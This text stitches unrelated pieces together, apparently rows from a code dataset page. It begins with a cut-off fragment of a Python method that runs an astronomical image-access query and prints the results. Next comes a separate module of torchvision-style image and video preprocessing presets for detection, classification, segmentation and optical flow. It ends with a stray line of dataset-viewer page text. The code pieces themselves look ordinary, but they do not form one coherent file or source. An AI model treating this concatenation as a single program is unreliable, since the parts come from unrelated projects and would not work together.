    Returns
    -------
    images : astropy Table or None
        The list of images in Astropy table format, or None if no images
        were found.

    Example
    -------
    Perform a simple SIA search.

    .. code-block:: python

        itab = dl.siaquery(0.5,10.0,0.1)
        The image list contains 6 entries

    Download the first image using :func:`copyurl()`.

    .. code-block:: python

        dl.copyurl(itab['access_url'][0],'im1.fits')
    '''
    # Not enough information input
    if (ra is None) or (dec is None):
        # BUGFIX: the old usage message advertised 'file=' and 'out='
        # parameters that this method does not accept.
        print ("Syntax - dl.siaquery(ra, dec, dist, verbose=False)")
        return
    # Check if we are logged in
    if not checkLogin(self):
        return
    # NOTE: the previous token/uid extraction here was dead code and
    # has been removed; the SIA service below is queried anonymously.
    # Use pyvo.dal.sia for now
    svc = sia.SIAService (SIA_DEF_ACCESS_URL)
    if dist is None:
        dist = SIA_DEF_SIZE
    # Run the search query; the RA extent is widened by 1/cos(dec) so the
    # search box covers the requested angular size on the sky.
    with warnings.catch_warnings():
        warnings.simplefilter('ignore', AstropyWarning)  # silence astropy chatter
        images = svc.search((ra,dec), (dist/np.cos(dec*np.pi/180), dist), verbosity=2)
    nrows = images.votable.nrows
    print ("The image list contains",nrows,"entries")
    res = (images.votable.to_table() if nrows > 0 else None)
    # Print the results if verbose set
    if verbose is True and nrows > 0:
        print (res)
    return res
|
"""
This file is part of the private API. Please do not use these classes directly, as they will be
modified in future versions without warning. The classes should be accessed only via the transforms argument of Weights.
"""
from typing import Optional, Tuple
import torch
from torch import Tensor, nn
from . import functional as F, InterpolationMode
__all__ = [
"ObjectDetection",
"ImageClassification",
"VideoClassification",
"SemanticSegmentation",
"OpticalFlow",
]
class ObjectDetection(nn.Module):
    """Inference preset for detection models: accept a PIL image or tensor
    and return a float tensor with values rescaled to [0, 1]."""

    def forward(self, img: Tensor) -> Tensor:
        # Convert PIL input to a tensor first, then rescale the dtype.
        tensor_img = img if isinstance(img, Tensor) else F.pil_to_tensor(img)
        return F.convert_image_dtype(tensor_img, torch.float)
class ImageClassification(nn.Module):
    """Standard ImageNet-style inference preset: resize, center-crop,
    rescale to [0, 1] and normalize with the given mean/std."""

    def __init__(
        self,
        *,
        crop_size: int,
        resize_size: int = 256,
        mean: Tuple[float, ...] = (0.485, 0.456, 0.406),
        std: Tuple[float, ...] = (0.229, 0.224, 0.225),
        interpolation: InterpolationMode = InterpolationMode.BILINEAR,
    ) -> None:
        super().__init__()
        # Stored as lists because the functional ops expect sequences.
        self._crop_size = [crop_size]
        self._size = [resize_size]
        self._mean = list(mean)
        self._std = list(std)
        self._interpolation = interpolation

    def forward(self, img: Tensor) -> Tensor:
        # Geometric ops first; they accept PIL images as well as tensors.
        resized = F.resize(img, self._size, interpolation=self._interpolation)
        cropped = F.center_crop(resized, self._crop_size)
        # Convert to tensor only after cropping, then rescale and normalize.
        if not isinstance(cropped, Tensor):
            cropped = F.pil_to_tensor(cropped)
        scaled = F.convert_image_dtype(cropped, torch.float)
        return F.normalize(scaled, mean=self._mean, std=self._std)
class VideoClassification(nn.Module):
    """Inference preset for video models: resize, center-crop, rescale and
    normalize each frame, returning clips in (N, C, T, H, W) layout."""

    def __init__(
        self,
        *,
        crop_size: Tuple[int, int],
        resize_size: Tuple[int, int],
        mean: Tuple[float, ...] = (0.43216, 0.394666, 0.37645),
        std: Tuple[float, ...] = (0.22803, 0.22145, 0.216989),
        interpolation: InterpolationMode = InterpolationMode.BILINEAR,
    ) -> None:
        super().__init__()
        # Stored as lists because the functional ops expect sequences.
        self._crop_size = list(crop_size)
        self._size = list(resize_size)
        self._mean = list(mean)
        self._std = list(std)
        self._interpolation = interpolation

    def forward(self, vid: Tensor) -> Tensor:
        # Promote a single clip (T, H, W, C) to a batch of one.
        need_squeeze = vid.ndim < 5
        if need_squeeze:
            vid = vid.unsqueeze(dim=0)
        # (N, T, H, W, C) => (N, T, C, H, W), then fold frames into the
        # batch axis so the 2D image ops can process every frame at once.
        vid = vid.permute(0, 1, 4, 2, 3)
        N, T, C, H, W = vid.shape
        vid = vid.view(-1, C, H, W)
        vid = F.resize(vid, self._size, interpolation=self._interpolation)
        vid = F.center_crop(vid, self._crop_size)
        vid = F.convert_image_dtype(vid, torch.float)
        vid = F.normalize(vid, mean=self._mean, std=self._std)
        # Unfold the frames and move channels before time:
        # (N, T, C, H, W) => (N, C, T, H, W)
        H, W = self._crop_size
        vid = vid.view(N, T, C, H, W).permute(0, 2, 1, 3, 4)
        if need_squeeze:
            vid = vid.squeeze(dim=0)
        return vid
class SemanticSegmentation(nn.Module):
    """Inference preset for segmentation models: optional resize, rescale
    to [0, 1] and normalize with the given mean/std."""

    def __init__(
        self,
        *,
        resize_size: Optional[int],
        mean: Tuple[float, ...] = (0.485, 0.456, 0.406),
        std: Tuple[float, ...] = (0.229, 0.224, 0.225),
        interpolation: InterpolationMode = InterpolationMode.BILINEAR,
    ) -> None:
        super().__init__()
        # None disables resizing entirely.
        self._size = [resize_size] if resize_size is not None else None
        self._mean = list(mean)
        self._std = list(std)
        self._interpolation = interpolation

    def forward(self, img: Tensor) -> Tensor:
        # Resize only when a target size was configured.
        if isinstance(self._size, list):
            img = F.resize(img, self._size, interpolation=self._interpolation)
        # Convert PIL input to a tensor, then rescale and normalize.
        if not isinstance(img, Tensor):
            img = F.pil_to_tensor(img)
        scaled = F.convert_image_dtype(img, torch.float)
        return F.normalize(scaled, mean=self._mean, std=self._std)
class OpticalFlow(nn.Module):
    """Inference preset for optical-flow models: convert both frames to
    contiguous float tensors with values mapped from [0, 1] to [-1, 1]."""

    def forward(self, img1: Tensor, img2: Tensor) -> Tuple[Tensor, Tensor]:
        processed = []
        for frame in (img1, img2):
            if not isinstance(frame, Tensor):
                frame = F.pil_to_tensor(frame)
            frame = F.convert_image_dtype(frame, torch.float)
            # map [0, 1] into [-1, 1]
            frame = F.normalize(frame, mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])
            processed.append(frame.contiguous())
        return processed[0], processed[1]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.